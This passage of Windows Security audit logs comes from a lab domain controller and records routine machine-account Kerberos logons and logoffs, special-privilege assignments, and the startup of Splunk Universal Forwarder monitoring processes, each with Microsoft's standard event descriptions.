Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:52:19 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264158
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7C3517
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:52:19 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264157
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7C3517
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62346
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:52:19 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264156
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7C3517
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:52:19 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264155
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7C34AB
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:52:19 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264154
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7C34AB
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62345
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:52:19 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264153
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7C34AB
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:52:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264161
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7C4262
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:52:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264160
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7C4262
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62355
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:52:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264159
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7C4262
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:53:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264163
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x57c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:53:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264162
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1afc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:53:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264164
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1ad0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:53:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264165
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x9bc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:53:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264166
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b70
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:53:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264168
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x3c0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:53:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264167
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x15bc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:53:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264171
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7C7D4D
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:53:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264170
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7C7D4D
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62368
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:53:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264169
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7C7D4D
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:54:03 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264172
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\WIN-DC-209$
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7BF8F8
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:54:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264185
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7C826E
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:54:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264184
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7C835C
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:54:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264183
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7C83A4
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:54:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264182
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7C8455
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62377
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:54:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264181
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7C8455
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:54:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264180
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7C83A4
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 62374
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:54:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
